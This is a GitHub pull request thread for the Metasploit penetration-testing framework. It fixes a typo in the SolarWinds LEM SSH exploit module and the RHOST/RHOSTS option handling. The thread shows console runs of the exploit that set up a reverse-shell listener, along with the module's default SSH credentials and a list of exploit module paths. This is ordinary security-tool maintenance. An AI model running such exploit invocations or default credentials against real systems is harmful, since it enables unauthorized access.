### PR TITLE
Fix typo and lacking RHOST in SSH module(s)

### PR DESCRIPTION
**Pull request by mubix**
Kinda need a RHOST to use an RCE...

### CODE REVIEW

**Comment by bcoles** [comment]
> 
> 
> Kinda need a RHOST to use an RCE...

Agreed, but `rhost` is now `rhosts`, and implied:

```
msf5 > use exploit/linux/ssh/solarwinds_lem_exec 
msf5 exploit(linux/ssh/solarwinds_lem_exec) > set rhosts  10.1.1.1
rhosts => 10.1.1.1
msf5 exploit(linux/ssh/solarwinds_lem_exec) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/ssh/solarwinds_lem_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 10.1.1.1:32022 - Attempting to login...
^C[*] Exploit completed, but no session was created.
msf5 exploit(linux/ssh/solarwinds_lem_exec) > 
```

Defining `rhost` manually should be unnecessary. This is usually reserved for instances where that target has a default IP address:

```
# grep -rn "Opt::RHOST" modules/exploits/
modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb:62:        Opt::RHOST(),
modules/exploits/unix/misc/polycom_hdx_auth_bypass.rb:57:        Opt::RHOST(),
modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb:45:      Opt::RHOST(),
modules/exploits/linux/http/linksys_apply_cgi.rb:52:        Opt::RHOST('192.168.1.1')
modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb:49:        Opt::RHOST('172.16.42.1')
modules/exploits/linux/http/pineapple_bypass_cmdinject.rb:48:        Opt::RHOST('172.16.42.1')
modules/exploits/linux/ssh/f5_bigip_known_privkey.rb:54:        Opt::RHOST(),
modules/exploits/linux/ssh/mercurial_ssh_exec.rb:43:        Opt::RHOST(),
modules/exploits/linux/ssh/exagrid_known_privkey.rb:52:        Opt::RHOST(),
modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb:52:        Opt::RHOST(),
modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb:47:        Opt::RHOST(),
modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb:55:        Opt::RHOST(),
modules/exploits/linux/ssh/symantec_smg_ssh.rb:61:        Opt::RHOST(),
modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb:48:        Opt::RHOST(),
modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb:49:        Opt::RHOST(),
modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb:53:        Opt::RHOST(),
modules/exploits/linux/misc/drb_remote_codeexec.rb:47:          Opt::RHOST(nil, false),
modules/exploits/multi/ssh/sshexec.rb:150:        Opt::RHOST(),
modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb:120:        Opt::RHOST(),
modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb:137:      Opt::RHOST("239.255.255.250"),
modules/exploits/apple_ios/ssh/cydia_default_ssh.rb:54:        Opt::RHOST(),
```

Granted, this isn't particularly user friendly. Most of these modules appear to be SSH related, and `rhost` / `rhosts` does not autocomplete. This should probably (?) be fixed in the SSH mixin.

That said, I can't be bothered looking into it. Approved. @wvu-r7

**Review by bcoles — APPROVED** [review]

File: modules/exploits/linux/ssh/solarwinds_lem_exec.rb [hunk 1]
```diff
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "SolarWind LEM Default SSH Password Remote Code Execution",
+      'Name'           => "SolarWinds LEM Default SSH Password Remote Code Execution",
       'Description'    => %q{
         This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH
```
Comment (bcoles) [inline modules/exploits/linux/ssh/solarwinds_lem_exec.rb]:
```suggestion
        This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH
```

**Comment by wvu-r7** [comment]
Yeah, let me fix that in the mixin.

**Comment by wvu-r7** [comment]
Looks like you created this PR from a branch you pushed to R7's repo, @mubix. That's okay, since you're a committer, but can you delete the branch once we're done here? Thanks.

**Comment by wvu-r7** [comment]
Testing after updating the mixin:

```
msf5 exploit(linux/ssh/solarwinds_lem_exec) > options

Module options (exploit/linux/ssh/solarwinds_lem_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         yes       The password for authentication
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     32022            yes       The target port
   USERNAME  cmc              yes       The username for authentication


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/ssh/solarwinds_lem_exec) > previous
msf5 exploit(linux/http/ubiquiti_airos_file_upload) > options

Module options (exploit/linux/http/ubiquiti_airos_file_upload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     443              yes       The target port (TCP)
   SSH_PORT  22               yes       SSH port
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Ubiquiti airOS < 5.6.2


msf5 exploit(linux/http/ubiquiti_airos_file_upload) >
```

**Comment by wvu-r7** [comment]
My PGP key expired literally just now, so I'm going to click the forbidden green button.

**Comment by wvu-r7** [comment]
Thanks for bringing this to our attention, @mubix!!

**Comment by tperry-r7** [comment]
# Release Notes
Added RHOST to SSH modules.

**Pull request merged**